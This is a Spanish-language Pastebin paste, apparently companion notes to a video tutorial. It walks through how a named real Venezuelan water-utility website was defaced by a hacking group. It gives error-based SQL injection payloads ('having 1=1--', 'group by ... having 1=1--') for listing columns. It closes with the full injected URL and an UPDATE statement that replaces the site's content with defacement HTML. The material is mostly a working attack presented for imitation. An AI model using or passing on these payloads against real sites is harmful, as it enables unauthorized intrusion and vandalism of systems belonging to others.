Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Como vemos esa web ha sido defaciada por R00t Mafia...
- Ahora yo les voy a ense�ar por medio de sql injection com hicieron ellos...
- usando:
- having+1=1--
- obtuvimos lo siguiente:
- Column 'ContentItemDetail.cid_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
- ahora claramente podemos continuar para sacar las otras tablas... miren la linea de abajo
- esa es la syntaxis que usaremos...
- Group by tabla.id having+1=1--
- =================================================
- listop ya tenemos las dos columnas que necesitamos para poder hacer una edicion del index de una manera exitosa... el id y el content =)
- update tabla set id = 'hacked'--
- con esa syntaxis podemos cambiar el content miren:
- esa es la relacion con lo que puse aqu�
- http://hidrocapital.com.ve/editor/detailtemplate.asp?item_id=1397update ContentItemDetail set cid_content='<body bgcolor="black"><center><font size="6" color="white" face="Tahoma"><b>Ro0T-MaFia Was Here!</b></font></center><p><center><img src="http://i35.tinypic.com/2rzqtys.jpg"></center><center><font size="4" color="white" face="Tahoma"><b>Contact: [email protected] - [email protected]</b></font></center><p><center><font size="2" color="white" face="Tahoma"><b>We are: JxE-13 | 0x0c | Soad | CyberNaj | KX-T33 | DrKSnix | Zero Bits | D4NB4R <p>'--
- esa fue la linea de code que usaron ellos para su index...
- Disculpen el no haber hablado pero estaba con dolor de garganta.. y sorry por la musica pero no estaba totalmente cargada... espero les haya gustado el tuto...
- no est� tan bien explicado en relaci�n a otros pero lo quer�a poner como un ejemplo real...
- BY: SEGURIDADBLANCA.ORG
Advertisement
Add Comment
Please, Sign In to add comment